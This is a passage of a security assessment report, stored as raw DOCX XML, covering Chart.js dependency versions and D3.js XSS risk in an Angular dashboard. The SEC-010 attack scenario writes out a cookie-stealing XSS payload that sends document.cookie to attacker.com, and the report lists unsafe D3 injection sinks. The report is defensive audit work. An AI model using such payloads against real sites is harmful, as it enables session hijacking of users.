        <w:t xml:space="preserve">is likely used, but states: "The full list of third-party packages cannot be confirmed without reviewing the template file and the Angular module declaration for this component." No version numbers are documented for Chart.js, the Angular wrapper, or the Nebular UI framework. Without confirmed version information, it is not possible to assess whether known CVEs affect the installed versions. Chart.js has had security-relevant releases addressing prototype pollution and ReDoS vulnerabilities in past versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 13 of the Chartjs screen documentation states: "The only external dependency implied by the component is the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chart.js library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">itself... The full list of third-party packages cannot be confirmed without reviewing the template file and the Angular module declaration for this component."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If an outdated version of Chart.js with a known prototype pollution vulnerability (e.g., CVE-2020-7746 affecting versions prior to 2.9.4) is installed, an attacker who can influence chart configuration data could pollute the JavaScript prototype chain, potentially affecting the behavior of other application components.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run a software composition analysis (SCA) tool (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">npm audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Snyk, OWASP Dependency-Check) against the project's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package-lock.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to identify installed versions and known CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Update Chart.js,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ng2-charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ngx-charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and Nebular to their latest stable versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrate SCA scanning into the CI/CD pipeline to automatically flag new vulnerabilities on each build.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Not documented — WHO: the development team or build engineer; WHAT: What are the exact installed versions of Chart.js, the Angular chart wrapper library (ng2-charts or equivalent), and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@nebular/theme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as declared in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">?; WHERE: Insert confirmed version numbers into the Description section of SEC-009 and cross-reference against the NVD CVE database]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chartjs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="X06bcfa35c937b9667ad69e6d0fb2f02a45863fd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 D3 —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security Profile: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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not documented — delegated to route guards in unreviewed routing module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not documented — delegated to route guards in unreviewed routing module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data Sensitivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium — D3 visualizations may render data from external sources in child components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attack Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium — D3.js DOM manipulation APIs in child components create XSS surface if user data is rendered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Finding Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critical: 0, High: 1, Medium: 1, Low: 1, Info: 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-010: D3.js DOM Manipulation XSS Risk in Child Components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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03 — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V5.3.3 — Verify that context-aware output encoding is used to protect against reflected, stored, and DOM XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">D3Component</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— child components rendered via template; D3.js</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.html()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.append()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, and</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.text()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DOM integrity; user session tokens; any data rendered by D3 child components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation explicitly identifies this risk: "The primary security consideration relevant to D3-based screens in general is the risk of XSS through D3's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.html()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.append()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">methods if user-supplied data is rendered as raw HTML — however, this concern applies to child components, not to this parent shell." D3.js operates outside Angular's template sanitization pipeline. Angular's built-in XSS protection (via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DomSanitizer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) applies to Angular template bindings (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[property]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), but D3's imperative DOM manipulation methods bypass this entirely. Specifically:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.select(...).html(userValue)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">injects raw HTML, including</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tags and event handlers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.select(...).append('foreignObject').html(userValue)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can inject arbitrary HTML into SVG.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.select(...).attr('onclick', userValue)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can inject JavaScript event handlers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If any child component rendered by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">D3Component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">passes data from an API response, URL parameter, or user input directly to these D3 methods without sanitization, XSS is achievable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 14 of the D3 screen documentation states: "The primary security consideration relevant to D3-based screens in general is the risk of XSS through D3's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.html()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.append()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">methods if user-supplied data is rendered as raw HTML — however, this concern applies to child components, not to this parent shell." (Development team credited for documenting this risk.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A child D3 component fetches dataset labels from an API endpoint. An attacker with write access to the data source (or via a stored XSS payload in the backend) injects the value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as a data label. The child component passes this value to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.select('.label').html(dataLabel)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. D3 injects the raw HTML into the DOM, the browser executes the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onerror</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">handler, and the attacker receives the victim's session cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Audit all child components rendered by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">D3Component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for uses of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.selection.html()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.selection.attr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with event handler attributes, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.selection.append('foreignObject')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— replace with safe alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// UNSAFE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">d3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.label'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(dataLabel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// SAFE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">d3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.label'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(dataLabel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// text() encodes HTML entities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For cases where HTML rendering is genuinely required, sanitize input using Angular's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
